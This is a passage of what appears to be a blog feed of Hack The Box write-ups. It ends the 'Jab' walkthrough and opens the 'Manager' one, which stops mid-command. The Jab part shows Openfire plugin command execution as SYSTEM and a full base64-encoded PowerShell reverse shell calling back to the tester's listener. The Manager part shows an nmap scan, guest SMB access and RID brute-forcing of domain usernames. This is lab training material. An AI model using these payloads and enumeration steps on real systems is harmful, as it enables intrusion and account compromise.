plugin, I went to <code class="language-text">Server</code> → <code class="language-text">Server Settings</code> → <code class="language-text">Management Tool</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1980fade020f7dd5be6b22e223c1ead1/4c5e0/openfire-server-settings-management-tool.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.65822784810127%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABl0lEQVR42q1T2W7bMBDU/39M3/sNfUuAAEWTFrYoypJ8UCKpg5Q8naVDIwWMAkVKYLS8NJydJQt7VGjPPZZlxr+26/XK/xb4cYR3A8JoUfTfv6LrWpzO57Rg+h7We1yMwWAtx9wYI5YQEEJMBB8xTROcc3DcO3qHovz2BertBU2tcKp+otUl6v0b1OsLqh3jrx9o9q9otLrFpkHbtn+g67qElih2+wq1rhDDgi0u6RQ79BidZU7bB1yJ9a/pSyuqqoLAUrJMehLKqWLB5WKIC3raYGiB4Tj3z1xPc2LNMGDbththWTLFuiaRT4SDddjty/sPmVCiIJNJP0cRE+nznVB8maaZp6wY54hSaR6iobXG4XBIirN3yat3747HYyKd5xnrerOjUEq9E05pMrByUjFRJank+AghVT6kaktMhJr+CYREfIhxTcQCGT9CXpc0M+4KNdVV9FCUZGM/0wr19AT1/IwTvVn/B6Gh8ZYGT3wlWfanCLfACs2WcFgnm/qRb3Jb/O0u8/MI4tvIqxa9wToaCnKs9oLfPFPuwO5e5ToAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="openfire settings management tool" title="" src="/static/1980fade020f7dd5be6b22e223c1ead1/50637/openfire-server-settings-management-tool.png" srcset="/static/1980fade020f7dd5be6b22e223c1ead1/dda05/openfire-server-settings-management-tool.png 158w, /static/1980fade020f7dd5be6b22e223c1ead1/679a3/openfire-server-settings-management-tool.png 315w, /static/1980fade020f7dd5be6b22e223c1ead1/50637/openfire-server-settings-management-tool.png 630w, /static/1980fade020f7dd5be6b22e223c1ead1/fddb0/openfire-server-settings-management-tool.png 945w, /static/1980fade020f7dd5be6b22e223c1ead1/4c5e0/openfire-server-settings-management-tool.png 966w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The plugin required a password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ee1a4cf67f21a9cb8cc33314709aebaf/2b72d/openfire-management-tool.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 41.77215189873418%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABP0lEQVR42n2SfWvCMBDG8/2/wr6EopSpbFRmq33Z7MuatiDW/0QF+4YgbdpnSZwVXFngx5O73OXIXUisvGD+PsObOodpmrAsq9M7wu7DMAzouo6FpkH7UGHqC5A4pAjDEJ7nIQgCUEoRRVGnwrfZbLDb7ZAkSS/b7RYJJ+bxJMtyZFnWcT6fcTwecTqdcDgc5F74iqLopSxLlFwvlwv2+z0InlZVVfLiggemXPM8x/V6xX+rbVupaZqCtA1DLy2TgU0jaMAY+0Nd12hYBVZXMla8hFDfAfXWoO4XAs/hrKUdcn8U3vp4J45jidiLvrui7+4nz7X5DFw4jgtym9hjkmKqqqpiMp1CURSMRiOMx2PJcDjEYDDg/ldMJjOsVqvf3MfPILZt4xlLHt4KiKqe58P3v7FcGtA0vfsy4oLn3B+sCj3K/rfgcgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="openfire management tool" title="" src="/static/ee1a4cf67f21a9cb8cc33314709aebaf/50637/openfire-management-tool.png" srcset="/static/ee1a4cf67f21a9cb8cc33314709aebaf/dda05/openfire-management-tool.png 158w, /static/ee1a4cf67f21a9cb8cc33314709aebaf/679a3/openfire-management-tool.png 315w, /static/ee1a4cf67f21a9cb8cc33314709aebaf/50637/openfire-management-tool.png 630w, /static/ee1a4cf67f21a9cb8cc33314709aebaf/fddb0/openfire-management-tool.png 945w, /static/ee1a4cf67f21a9cb8cc33314709aebaf/2b72d/openfire-management-tool.png 980w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used the password <code class="language-text">123</code> mentioned on the GitHub page. Then from the dropdown options, I selected <code class="language-text">system command</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5f2f2ff8cc0df80ec31c0b1f9dab051b/21cd7/openfire-management-tool-system-command.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 39.87341772151899%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABLElEQVR42nWR3W6CQBCFef8H6KP0zp9WYgvWC8CUFOWCAAkKgmJZ/oRTzqbSGzrJl5mdmT07u6vsn5+wXMwwX7xA1/WRzWYzxpqm/ct6vYaqqlBXK7y9zqHYxhamZeFju4U1eLLb7WCapowNw4Bt23BdF4fDYRLHcSR75wtKnJyRJAniOJYwPp1O45oxc1mWIU1TCePJ9YDS9z0e0JqmkU3X63VsLooCU9b/0nV/OWWqkWK+7yMIAoRhKPE8T16bsMZcFPqIAg9ZHKGpm2lBTnq/34dTO+l57dvthrZtpSesCVFAsyPMrBS6W0CU9bQgm7mZJoSQ0xyPx/Ew1vM8x3l4VwouPy94HwQLUU0Lcqq6ruVmTsMPIXxb1ghrZVniO89QiQu6tkJVVTL/A87HV1mkQ0SzAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="openfire management tool system command" title="" src="/static/5f2f2ff8cc0df80ec31c0b1f9dab051b/50637/openfire-management-tool-system-command.png" srcset="/static/5f2f2ff8cc0df80ec31c0b1f9dab051b/dda05/openfire-management-tool-system-command.png 158w, /static/5f2f2ff8cc0df80ec31c0b1f9dab051b/679a3/openfire-management-tool-system-command.png 315w, /static/5f2f2ff8cc0df80ec31c0b1f9dab051b/50637/openfire-management-tool-system-command.png 630w, /static/5f2f2ff8cc0df80ec31c0b1f9dab051b/fddb0/openfire-management-tool-system-command.png 945w, /static/5f2f2ff8cc0df80ec31c0b1f9dab051b/21cd7/openfire-management-tool-system-command.png 962w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Running <code class="language-text">whoami</code> showed that commands were being executed as <code class="language-text">nt authority\system</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d133a700809ce7c3393fa96e6476f2f5/4c5e0/openfire-management-tool-system-command-whoami.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.30379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABPklEQVR42o2S/W6CQBDEef9H6Iv0r8a2ltiKbQLKgQeJRiC0fEWjgiI43dtUUlNMeskvwy3DZHeDJu/v8DR4wODxGePxGIZhXDGZTLh+i9FoBF3Xob8M8TocQHPe32CaJgz60LKsDlW7qBACvu/D87xeXNdl5NyBlmQ50ixFmiRIiDRNkWXZH83z/CZFUXRobdtCcT6foc7xeGTTZrNhXa/X2O/3+O/R+ooqbLVaIQgCJooivi+XSywWC4RhyLUgCImIpsi4kZuBVVVRdwWbyrJittsdhQaI48+uVpZl93w6nfoDWxq9OhwoYIsdjaqMah1K4/iL96Tul1UpGqKu6/5AZa6pM7U31UHTNPi956sgfkeQNs1Ph9KZQgoLnm2ySjGF51jw3Rl8OYek30JK2YttC7gz8s4+4NpT2ELgG+svoERCpRC+AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="openfire management tool system command whoami" title="" src="/static/d133a700809ce7c3393fa96e6476f2f5/50637/openfire-management-tool-system-command-whoami.png" srcset="/static/d133a700809ce7c3393fa96e6476f2f5/dda05/openfire-management-tool-system-command-whoami.png 158w, /static/d133a700809ce7c3393fa96e6476f2f5/679a3/openfire-management-tool-system-command-whoami.png 315w, /static/d133a700809ce7c3393fa96e6476f2f5/50637/openfire-management-tool-system-command-whoami.png 630w, /static/d133a700809ce7c3393fa96e6476f2f5/fddb0/openfire-management-tool-system-command-whoami.png 945w, /static/d133a700809ce7c3393fa96e6476f2f5/4c5e0/openfire-management-tool-system-command-whoami.png 966w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So, I started a Netcat listener and used the PowerShell #3 (Base64) command from <a href="https://www.revshells.com/" target="_blank">revshells</a> to send a reverse shell:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA</code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5ccec6e1e714cb7092f683e3a14882bd/4c5e0/openfire-management-tool-system-command-send-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.93670886075949%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABQUlEQVR42nWS226CQBCGef8n6Js06UVjtIQW8cDBRYpeCIWInGqjF7LA392pUow6yZd/d2cyu/NnFf/5CcPBC14HQ+gfOsbj8Q26rj9E0zSoqgp1NML72wDKcm7AskxMJhOhFmzbJuTacRxS13WxXq+xWq1u8H0fnucR/qcHJc0LZFmGNE2x2+2I7XZ7hcyVZXlDURREtxcobduiH5xzKtrv93SRLDwcDpSTtX0u0d8ruBPH4xFRFCGO444gCBCGITabDanMh+GXIBIT5PSQhw1PpxONniRJZ0McRzCMqfB1cbYnFXlpTyKm+EZd1/cbNk2DquKkfeQL8lxa8XN13gpks6qqzg3l7ERD2grlIlnzippcqGtOPl2ad+dU94fMK8yeg1lTuAJmzcDs2f96YYMx9hBTfKmFOcXSNOBYc/piv+/bnkPgZcmuAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="openfire management tool system command send shell" title="" src="/static/5ccec6e1e714cb7092f683e3a14882bd/50637/openfire-management-tool-system-command-send-shell.png" srcset="/static/5ccec6e1e714cb7092f683e3a14882bd/dda05/openfire-management-tool-system-command-send-shell.png 158w, /static/5ccec6e1e714cb7092f683e3a14882bd/679a3/openfire-management-tool-system-command-send-shell.png 315w, /static/5ccec6e1e714cb7092f683e3a14882bd/50637/openfire-management-tool-system-command-send-shell.png 630w, /static/5ccec6e1e714cb7092f683e3a14882bd/fddb0/openfire-management-tool-system-command-send-shell.png 945w, /static/5ccec6e1e714cb7092f683e3a14882bd/4c5e0/openfire-management-tool-system-command-send-shell.png 966w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">nc</code> caught a shell as <code class="language-text">nt authority\system</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.11.4] 63497 PS C:\Program Files\Openfire\bin> whoami nt authority\system PS C:\Program Files\Openfire\bin> cd /users/administrator/desktop PS C:\users\administrator\desktop> ls Directory: C:\users\administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/19/2024 8:23 PM 34 root.txt</code></pre></div>https://mgarrity.com/hack-the-box-manager/https://mgarrity.com/hack-the-box-manager/Sun, 14 Jul 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9c4d3efc6a6d544afb0330dabb69e21d/3b67f/manager.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABCklEQVR42mMQkdX+jwuLymn/F5LR/s8tof1fUAbCx6cehBnwGcYDNEhKSf2/vq76f2llzf+8koQNZcBlGB9Qs4Wx1v+2WNf/y6pj/zeE2vw3M4aI4zMUq4FC0jr/5dQ0/5e7Wf+fGLXu/6OtK/93eE75X+Vr818K6FJhGR3iDQTZziuh89/IVON/k6/v/5aknf8/nNn0P911yv8yD8f/xiZaQHncrsTuQqALpBQ0/relO/xvb2v4P6u75b+OhsL/omDd/zJKOuCIIsnLYiBXAsPKzFDzf3Oa3f++dPP/eQGa/82NdAlGDN5YBmmWlNf8b6gPdLGiDvmxjOxSEVmd//xS2v+F4Xz8BgIAv9wJVGlcjYMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Manager" title="" src="/static/9c4d3efc6a6d544afb0330dabb69e21d/50637/manager.png" srcset="/static/9c4d3efc6a6d544afb0330dabb69e21d/dda05/manager.png 158w, /static/9c4d3efc6a6d544afb0330dabb69e21d/679a3/manager.png 315w, /static/9c4d3efc6a6d544afb0330dabb69e21d/50637/manager.png 630w, /static/9c4d3efc6a6d544afb0330dabb69e21d/fddb0/manager.png 945w, /static/9c4d3efc6a6d544afb0330dabb69e21d/3b67f/manager.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Manager is a Windows machine running Active Directory. After gathering a list of domain users by brute-forcing RIDs, one of the users is found to have their username set as the password (<code class="language-text">operator</code>). These credentials allow access to an MSSQL instance which can be used to enumerate directories and files on the server using <code class="language-text">xp_dirtree</code>. This leads to the discovery of a website backup ZIP in the web root. Once the ZIP has been downloaded, an XML file can be found that contains the credentials for the user <code class="language-text">raven</code>. Enumeration of AD CS reveals an ESC7 vulnerability due to the <code class="language-text">ManageCA</code> permission being granted to <code class="language-text">raven</code>. This allows the user to perform administrative CA actions which can be leveraged to obtain a certificate for the <code class="language-text">administrator</code>, leading to a shell as <code class="language-text">nt authority\system</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ nmap -p- -sC -sV -oA nmap/output 10.10.11.236 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-10 15:04 EDT Nmap scan report for 10.10.11.236 Host is up (0.048s latency). Not shown: 65517 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Manager |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-11 02:06:22Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-ntlm-info: | 10.10.11.236:1433: | Target_Name: MANAGER | NetBIOS_Domain_Name: MANAGER | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: manager.htb | DNS_Computer_Name: dc01.manager.htb | DNS_Tree_Name: manager.htb |_ Product_Version: 10.0.17763 |_ssl-date: 2024-07-11T02:07:51+00:00; +7h00m13s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-07-11T02:03:42 |_Not valid after: 2054-07-11T02:03:42 | ms-sql-info: | 10.10.11.236:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc01.manager.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:dc01.manager.htb | Not valid before: 2023-07-30T13:51:28 |_Not valid after: 2024-07-29T13:51:28 |_ssl-date: 2024-07-11T02:07:51+00:00; +7h00m13s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-07-11T02:07:51+00:00; +7h00m13s from scanner time. | ssl-cert: Subject: commonName=dc01.manager.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:dc01.manager.htb | Not valid before: 2023-07-30T13:51:28 |_Not valid after: 2024-07-29T13:51:28 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49690/tcp open msrpc Microsoft Windows RPC 49691/tcp open msrpc Microsoft Windows RPC 49701/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 7h00m13s, deviation: 0s, median: 7h00m12s | smb2-time: | date: 2024-07-11T02:07:11 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 206.60 seconds</code></pre></div> <p>Notable open ports:</p> <ul> <li>53 (DNS)</li> <li>80 (HTTP)</li> <li>88 (Kerberos)</li> <li>135, 593 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>1433 (MSSQL)</li> <li>3268 (LDAP)</li> <li>3269 (LDAPS)</li> <li>5985 (WinRM)</li> </ul> <p>Active Directory:</p> <ul> <li>domain: manager.htb</li> <li>hostname: DC01</li> </ul> <p>Webpage on port 80:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/92a46a5edd50476e8a992d6bdf9a2b0d/d9c41/manager-webpage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 66.45569620253164%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACu0lEQVR42lWT2W7aUBCGveAF8IKNjQ022GAMxhs7pKma0iRSq6iVepWLXPQ9+k696Bv+HR+aLhejOfKRvzPzzz9cHMcIfB8PD/d4fn7G+XzCZrPBdru95t0Ok3AEWRLhuQ66nTb6fRua1kW324XrutB1nZ1boghOEARwHAdVVRlgv98zWBN1maPKM2RjF7ElIzQlOB0BpiKgI/HoUigiD5lCFTm0eK5hceB5nkGDIMDxeGSw9bpGWTTAFbI4QDrsYRnYSD0NYwJ7HR6DNge3CTqbCg9D/g18DUmSkOc5wdao65rlpuo4nkKhDiyrh8XIxqyvILZVxK6O8cBGaKkIdAG+Jl6BtuNgHEUYeD5u3tzi/vER2/0BRV2hqkr2SN+2ocgtJF4DtRCOfNj0rasZcEwNM7dDj8hXYGCZOEYBbmZjHOcxvt7s8OW4xadNgbqqkK9y+IMBVKWF+aiPxdBE4Dk0kAFGowCLxQLZcoF07IF7d/mAj7saS4FDqctINQXzMMB5XeFcFajKEmkyg2P3mNa6KiEwZGq7jUXoIJnGWJHOdU0ybbbgXl5e8PnpCaZhIAxDTCcTzOcJ7t5fcHe54Pb2LW4Oe2TREH1dhd6W4RptTAcGpo6KyOmw9otVhmUSgTN7PRLWwaRHApMWvqExvx0OB5xOpz/DWVOuSc+adC3LAiVJkaUJpjSgSU9EREPyTeWq4Te/jZ+nAD/OY3yfGlDJpI0u+Yosk2VI6ZwkCfKiYFNvHmlazOg+tBQsBirMjgxBbIHjydgabYFLgjdhqzI832PDaGD/AkvSkwHpjg0rLzAh66SuCqMtvfr5rw+ZFxWF/VyQqZfLJQM21TZevFZWk5Wobaq2KCtMPAtJX2Kb5HWF6+qJtIMiZZmMbdsWwQqCZVitsv+Ar4ZnQKZjjch3MKPh5KGFbKjjF1LlW9tMaQESAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="manager webpage" title="" src="/static/92a46a5edd50476e8a992d6bdf9a2b0d/50637/manager-webpage.png" srcset="/static/92a46a5edd50476e8a992d6bdf9a2b0d/dda05/manager-webpage.png 158w, /static/92a46a5edd50476e8a992d6bdf9a2b0d/679a3/manager-webpage.png 315w, /static/92a46a5edd50476e8a992d6bdf9a2b0d/50637/manager-webpage.png 630w, /static/92a46a5edd50476e8a992d6bdf9a2b0d/fddb0/manager-webpage.png 945w, /static/92a46a5edd50476e8a992d6bdf9a2b0d/d9c41/manager-webpage.png 1084w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The guest account was enabled, but it didn't provide access to any interesting shares:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ netexec smb 10.10.11.236 -u 'a' -p '' --shares SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) SMB 10.10.11.236 445 DC01 [+] manager.htb\a: (Guest) SMB 10.10.11.236 445 DC01 [*] Enumerated shares SMB 10.10.11.236 445 DC01 Share Permissions Remark SMB 10.10.11.236 445 DC01 ----- ----------- ------ SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin SMB 10.10.11.236 445 DC01 C$ Default share SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC SMB 10.10.11.236 445 DC01 NETLOGON Logon server share SMB 10.10.11.236 445 DC01 SYSVOL Logon server share</code></pre></div> <p>I was able to enumerate usernames by using the <code class="language-text">--rid-brute</code> option in <code class="language-text">netexec</code>, which iterates through possible RID values appended to the domain’s base SID in order to construct full SIDs and identify those that map to valid user or group accounts:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ netexec smb 10.10.11.236 -u 'a' -p '' --rid-brute SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) SMB 10.10.11.236 445 DC01 [+] manager.htb\a: (Guest) SMB 10.10.11.236 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.236 445 DC01 500: MANAGER\Administrator (SidTypeUser) SMB 10.10.11.236 445 DC01 501: MANAGER\Guest (SidTypeUser) SMB 10.10.11.236 445 DC01 502: MANAGER\krbtgt (SidTypeUser) SMB 10.10.11.236 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup) SMB 10.10.11.236 445 DC01 513: MANAGER\Domain Users (SidTypeGroup) SMB 10.10.11.236 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup) SMB 10.10.11.236 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup) SMB 10.10.11.236 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup) SMB 10.10.11.236 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias) SMB 10.10.11.236 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup) SMB 10.10.11.236 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup) SMB 10.10.11.236 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.11.236 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.236 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.11.236 445 DC01 525: MANAGER\Protected Users (SidTypeGroup) SMB 10.10.11.236 445 DC01 526: MANAGER\Key Admins (SidTypeGroup) SMB 10.10.11.236 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup) SMB 10.10.11.236 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias) SMB 10.10.11.236 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.236 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.236 445 DC01 1000: MANAGER\DC01$ (SidTypeUser) SMB 10.10.11.236 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias) SMB 10.10.11.236 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup) SMB 10.10.11.236 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias) SMB 10.10.11.236 445 DC01 1113: MANAGER\Zhong (SidTypeUser) SMB 10.10.11.236 445 DC01 1114: MANAGER\Cheng (SidTypeUser) SMB 10.10.11.236 445 DC01 1115: MANAGER\Ryan (SidTypeUser) SMB 10.10.11.236 445 DC01 1116: MANAGER\Raven (SidTypeUser) SMB 10.10.11.236 445 DC01 1117: MANAGER\JinWoo (SidTypeUser) SMB 10.10.11.236 445 DC01 1118: MANAGER\ChinHae (SidTypeUser) SMB 10.10.11.236 445 DC01 1119: MANAGER\Operator (SidTypeUser)</code></pre></div> <p>I took all the SidTypeUser accounts from the output and extracted just the usernames:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ awk '{gsub("MANAGER\\\\", "", $6); print tolower($6)}' 